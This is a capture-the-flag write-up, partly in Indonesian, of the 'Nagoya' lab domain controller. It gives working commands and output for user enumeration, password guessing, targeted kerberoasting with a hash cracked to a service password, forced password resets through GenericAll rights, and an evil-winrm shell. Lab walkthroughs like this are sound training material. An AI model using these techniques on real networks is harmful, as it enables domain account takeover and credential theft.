Nagoya [soon]

Information Gathering

NMAP - Ports and Services

PORT      STATE SERVICE           VERSION
53/tcp    open  domain            Simple DNS Plus
80/tcp    open  http              Microsoft IIS httpd 10.0
|_http-title: Nagoya Industries - Nagoya
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open  kerberos-sec      Microsoft Windows Kerberos (server time: 2025-02-11 16:14:25Z)
135/tcp   open  msrpc             Microsoft Windows RPC
139/tcp   open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp   open  ldap              Microsoft Windows Active Directory LDAP (Domain: nagoya-industries.com0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?
3268/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: nagoya-industries.com0., Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl?
3389/tcp  open  ms-wbt-server     Microsoft Terminal Services
|_ssl-date: 2025-02-11T16:16:13+00:00; -2h35m20s from scanner time.
| ssl-cert: Subject: commonName=nagoya.nagoya-industries.com
| Not valid before: 2025-02-10T16:09:22
|_Not valid after:  2025-08-12T16:09:22
| rdp-ntlm-info: 
|   Target_Name: NAGOYA-IND
|   NetBIOS_Domain_Name: NAGOYA-IND
|   NetBIOS_Computer_Name: NAGOYA
|   DNS_Domain_Name: nagoya-industries.com
|   DNS_Computer_Name: nagoya.nagoya-industries.com
|   DNS_Tree_Name: nagoya-industries.com
|   Product_Version: 10.0.17763
|_  System_Time: 2025-02-11T16:15:29+00:00
5985/tcp  open  http              Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf            .NET Message Framing
49666/tcp open  msrpc             Microsoft Windows RPC
49668/tcp open  msrpc             Microsoft Windows RPC
49676/tcp open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
49678/tcp open  msrpc             Microsoft Windows RPC
49679/tcp open  msrpc             Microsoft Windows RPC
49693/tcp open  msrpc             Microsoft Windows RPC
49708/tcp open  msrpc             Microsoft Windows RPC
49802/tcp open  msrpc             Microsoft Windows RPC
Service Info: Host: NAGOYA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-02-11T16:15:29
|_  start_date: N/A
|_clock-skew: mean: -2h35m23s, deviation: 2s, median: -2h35m25s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 125.21 seconds

Initial Access

80 - WEB

Manual Inspection

terdapat list team, isinya first name dan last name. mari kita save sebagai wordlist user enum, as-reproast dengan format

first
last
first.last

wordlist

Matthew
Harrison
Emma
Miah
Rebecca
Bell
Scott
Gardner
Terry
Edwards
Holly
Matthews
Anne
Jenkins
Brett
Naylor
Melissa
Mitchell
Craig
Carr
Fiona
Clark
Patrick
Martin
Kate
Watson
Kirsty
Norris
Andrea
Hayes
Abigail
Hughes
Melanie
Watson
Frances
Ward
Sylvia
King
Wayne
Hartley
Iain
White
Joanna
Wood
Bethan
Webster
Elaine
Brady
Christopher
Lewis
Megan
Johnson
Damien
Chapman
Joanne
Lewis
Matthew.Harrison
Emma.Miah
Rebecca.Bell
Scott.Gardner
Terry.Edwards
Holly.Matthews
Anne.Jenkins
Brett.Naylor
Melissa.Mitchell
Craig.Carr
Fiona.Clark
Patrick.Martin
Kate.Watson
Kirsty.Norris
Andrea.Hayes
Abigail.Hughes
Melanie.Watson
Frances.Ward
Sylvia.King
Wayne.Hartley
Iain.White
Joanna.Wood
Bethan.Webster
Elaine.Brady
Christopher.Lewis
Megan.Johnson
Damien.Chapman
Joanne.Lewis

Kerbrute

┌──(kali㉿kali)-[~/ctf/offsec/nagoya]
└─$ ./kerbrute_linux_amd64 userenum -d nagoya-industries.com --dc 192.168.155.21 users 

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 02/11/25 - Ronnie Flathers @ropnop

2025/02/11 13:59:04 >  Using KDC(s):
2025/02/11 13:59:04 >   192.168.155.21:88

2025/02/11 13:59:05 >  [+] VALID USERNAME:       [email protected]
2025/02/11 13:59:05 >  [+] VALID USERNAME:       [email protected]
2025/02/11 13:59:05 >  [+] VALID USERNAME:       [email protected]
2025/02/11 13:59:05 >  [+] VALID USERNAME:       [email protected]
2025/02/11 13:59:05 >  [+] VALID USERNAME:       [email protected]
2025/02/11 13:59:05 >  [+] VALID USERNAME:       [email protected]
2025/02/11 13:59:05 >  [+] VALID USERNAME:       [email protected]
2025/02/11 13:59:05 >  [+] VALID USERNAME:       [email protected]
2025/02/11 13:59:05 >  [+] VALID USERNAME:       [email protected]
2025/02/11 13:59:05 >  [+] VALID USERNAME:       [email protected]
2025/02/11 13:59:05 >  [+] VALID USERNAME:       [email protected]
2025/02/11 13:59:05 >  [+] VALID USERNAME:       [email protected]
2025/02/11 13:59:05 >  [+] VALID USERNAME:       [email protected]
2025/02/11 13:59:05 >  [+] VALID USERNAME:       [email protected]
2025/02/11 13:59:06 >  [+] VALID USERNAME:       [email protected]
2025/02/11 13:59:06 >  [+] VALID USERNAME:       [email protected]
2025/02/11 13:59:06 >  [+] VALID USERNAME:       [email protected]
2025/02/11 13:59:06 >  [+] VALID USERNAME:       [email protected]
2025/02/11 13:59:06 >  [+] VALID USERNAME:       [email protected]
2025/02/11 13:59:06 >  [+] VALID USERNAME:       [email protected]
2025/02/11 13:59:06 >  [+] VALID USERNAME:       [email protected]
2025/02/11 13:59:06 >  [+] VALID USERNAME:       [email protected]
2025/02/11 13:59:06 >  [+] VALID USERNAME:       [email protected]
2025/02/11 13:59:06 >  [+] VALID USERNAME:       [email protected]
2025/02/11 13:59:06 >  [+] VALID USERNAME:       [email protected]
2025/02/11 13:59:06 >  [+] VALID USERNAME:       [email protected]
2025/02/11 13:59:06 >  [+] VALID USERNAME:       [email protected]
2025/02/11 13:59:06 >  [+] VALID USERNAME:       [email protected]

AS-REPROAST

┌──(kali㉿kali)-[~/ctf/offsec/nagoya]
└─$ impacket-GetNPUsers nagoya-industries.com/ -dc-ip 192.168.155.21 -usersfile users
[SNIP
[-] User Matthew.Harrison doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Emma.Miah doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Rebecca.Bell doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Scott.Gardner doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Terry.Edwards doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Holly.Matthews doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Anne.Jenkins doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Brett.Naylor doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Melissa.Mitchell doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Craig.Carr doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Fiona.Clark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Patrick.Martin doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Kate.Watson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Kirsty.Norris doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Andrea.Hayes doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Abigail.Hughes doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Melanie.Watson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Frances.Ward doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Sylvia.King doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Wayne.Hartley doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Iain.White doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Joanna.Wood doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Bethan.Webster doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Elaine.Brady doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Christopher.Lewis doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Megan.Johnson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Damien.Chapman doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Joanne.Lewis doesn't have UF_DONT_REQUIRE_PREAUTH set

Brute Force

karena udah mentok akhirnya pake brute force

ada beberapa skenario:

di footer ada tahun 2023
nama perusahaannya Nagoya
mesinnya realise tanggal 16 juni 2023
musim realisenya adalah summer

untuk membuat wordlistnya bisa menggunakan wordlist generator

┌──(kali㉿kali)-[~/ctf/offsec/nagoya/wl]
└─$ nxc smb 192.168.155.21 -u Fiona.Clark -p 'Summer2023'
SMB         192.168.155.21  445    NAGOYA           [*] Windows 10 / Server 2019 Build 17763 x64 (name:NAGOYA) (domain:nagoya-industries.com) (signing:True) (SMBv1:False)
SMB         192.168.155.21  445    NAGOYA           [+] nagoya-industries.com\Fiona.Clark:Summer2023

Priv Esc

Bloodhound

bloodhound-python -d nagoya-industries.com -ns 192.168.155.21 -u Fiona.Clark -p Summer2023 -c all

fiona.clark merupakan member dari employees group

Employees group memiliki degre object control terhadap 4 user dengan genericAll privilege

BETHAN.WEBSTER
IAIN.WHITE
JOANNA.WOOD
SVC_HELPDESK

selain itu terdapat 2 user dengan service principal

SVC_MSSQL
SVC_HELPDESK

selanjutnya saya akan melakukan kerberoasting

Sebetulnya bisa saja takeover setiap akun, karena dengan privilege GenericAll bisa melakukan forceChange password user, tetapi sangat disayangkan jika melakukan forceChangepassword yang dimana kita tidak bisa memperluas foodhold dengan spray password

                                                                    
┌──(kali㉿kali)-[~/ctf/offsec/nagoya/targetedKerberoast]
└─$ python3 targetedKerberoast.py -v -d 'nagoya-industries.com' -u 'Fiona.Clark' -p 'Summer2023' --dc-ip 192.168.155.21 -o hash.hashcat --output-format hashcat
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Writing hash to file for (svc_helpdesk)
[VERBOSE] SPN added successfully for (Iain.White)
[+] Writing hash to file for (Iain.White)
[VERBOSE] SPN removed successfully for (Iain.White)
[VERBOSE] SPN added successfully for (Joanna.Wood)
[+] Writing hash to file for (Joanna.Wood)
[VERBOSE] SPN removed successfully for (Joanna.Wood)
[VERBOSE] SPN added successfully for (Bethan.Webster)
[+] Writing hash to file for (Bethan.Webster)
[VERBOSE] SPN removed successfully for (Bethan.Webster)
[+] Writing hash to file for (svc_mssql)

selanjutnya crack dengan hashcat

C:\tools\hashcat>hashcat hash.hashcat C:\tools\seclist\rockyou.txt --show
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.

$krb5tgs$23$*svc_mssql$NAGOYA-INDUSTRIES.COM$nagoya-industries.com/svc_mssql*$c9ae0e8614dcdbc579bb1b727841e4ec$7598cae1c21cb43baf3b05f64ef1599c6a653b87f8ac7d1592372cf06533b222a785e583c9c23e63796c407306d7a6636895cf0e3c573c25b104a90187bae3698b26097a87f8a5ef611f38f80b3fb3866d37ce6f97688f8a5638048d7294842e452523e0c314824b5b1011cda61bd64193c50f0acd7b55c002d68e55783e2fdf7f16695728e8f8585049c9e416221e6fd568cbb3e109875cc70463ffd5eb94fdd1662932cd432745bbda705b60b44ede6bbedd8dd75f030aa71e11e7b1c5d1abc6a9256a4b4ba9ba3ab0cb3af6e5977cb39f69a69a0a4f1adda9d0f187c4362e5c7ddc095f23cdafe28451f247923d6c64359df799987ff6ee30451b1d2b4e2c74428bd6c08a59ae64ee5801a44d45ca112642b740452e0ba257b30e3462f8f2c756ff2dedea3e86fcaa26f127509f20e4ce8fb94737bc430f2cd9d22a8a921abb71aca4b2098c61be464d75b4df030560bb53b0fabab5291805946252e3817cc46b5d4167929233f7121bc8b1dfb915176a940c36a782e0d32ec65b0f150781629665bd69672a6155f3c0179bd2772237d27c7724d903d0637868e8c9d242ff2c6fe1d5123576f5c905511989c5a230cc83703a27f1ea042c63c6e5690de0d0eae3eb40106b7834adcd94e34e6b0fa18e0ac6726ffe941865f52b3a4959fbe2e0665c8b322df02540949e2a8fd2da818a873a3ab7becd49eb3be3ddc6f5fbbc4147a980594935842832c80ffbe861a3f75dcef0cb34acd6da2f0beae1521b27546441e2c07ad7b9dcf555b0fa14c872f513ace445f747224c4d9d4baf11c3e06a00ed5d3e5ef7f92715ecab586f560d23ee05597ec419a8e62a972e8e15a66e5b123528f5a3c3d68b03cab40b01c7e984f63a92ad636f17d3a927961b196727cc4fcc74bc8c2cc574360e4c76c8674652cdbe68a510ca7a97717ef6b088cdbef20c8a812ce72aa1dc6c9385460c2e93bfa87c7a2a4b84b46c35beadfe0f513f59dae385da603c46d5a10b6a267e86d8249742a1e5f0161ccc7c85ab063d3d5744841b6ad6739fa68bde9a83bdf2a8fffd9d2c5dc8316d34a5807166a3cfc491aab3b56204f9dbbe3733bd8e63033947bd680cdda26da15d813db03b644b0c130d35c3fe6d4ade0e19e7895557302b7ac7abc93ae29adc6bcb9419cfa4aa6639dfcddc0c3a5c5397f5002c991006188c5069e5fc4a958a95d6718d20718110c03c8c9ac5f8df67287b031cb4a0a5c1d132d47eab8de75f039aa683f4191e50c3d2801349ee8ca4d2159968e8b397677892e8426384ed5616937fcd36a77ea17c7cca90435b32189c1af5735d5ed61eb8682ef3213f5f72037518449d9468291c8d940f351fb927f4eb675a4ca6081266d0288e05e8d7e783a5d9a7d5535a47690218f6f44d385ef980fd52648524970a32166fc9a2c6e516852a2177e4ae0b40d755bccfb5c02c16766aebe23ace6bd532e591517cddf6e53bb39f33ca2d82d13446a9907760644187de88cf6bef6d977a46f981198da5e10793e039271a3e7d02789156949ab3d189bd25850f4ea8104e3b84d19a2cbe6bc0bc5ab0ddd29cd7fd54f77ac67816402b6a9aa054d1049d6add20689df7055a7465ae4604433020ba:Service1

creds : svc_mssql:Service1

karena ga bisa ngapa-ngapain jidi terpaksa change password user, disini user yang akan di change password adalah joanna.wood katena joana member dari Helpdesk group yg punya genericAll priv ke christopher.lewis yang dimana dia punya privilege CanPSRemote ke Nagoya.nagoya-industries.com (intinya biar bisa rce)

#change password joanna.wood
net rpc password "JOANNA.WOOD" "Password123" -U "nagoya-industries.com"/"Fiona.Clark"%"Summer2023" -S 192.168.155.21

#change password CHRISTOPHER.LEWIS
net rpc password "CHRISTOPHER.LEWIS" "Password123" -U "nagoya-industries.com"/"JOANNA.WOOD"%"Password123" -S 192.168.155.21

selanjutnya evil-winrm

┌──(kali㉿kali)-[~/ctf/offsec/nagoya/bloodhound-collect]
└─$ evil-winrm -i 192.168.155.21 -u CHRISTOPHER.LEWIS -p Password123
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                                                                   
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                                                                     
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents>

PreviousVault NextHokkaido [soon]

Last updated 10 months ago